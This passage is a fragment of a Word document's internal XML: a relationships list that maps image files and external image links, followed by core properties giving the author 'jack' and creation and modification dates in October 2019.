Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p0.ssl.qhimg.com/t012128c603810b90b1.jpg" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p2.ssl.qhimg.com/t0186a7cd8b694eadb0.jpg" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p1.ssl.qhimg.com/t01055a23cacad864af.jpg" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p0.ssl.qhimg.com/t0190dec4b486262a3d.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p3.ssl.qhimg.com/t01f606eef4a3121817.jpg" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p2.ssl.qhimg.com/t01829699aaeba7d22b.jpg" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p2.ssl.qhimg.com/t011aefb72d68b8727e.jpg" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q1.PNG" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q.PNG" TargetMode="External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hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q3.PNG" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q7.PNG" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q6.png" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q11.PNG" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q10.PNG" TargetMode="Externa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2019-10-08T08:20:00Z</dcterms:created>
  <dc:creator>jack</dc:creator>
  <cp:lastModifiedBy>jack</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-08T08:25:40Z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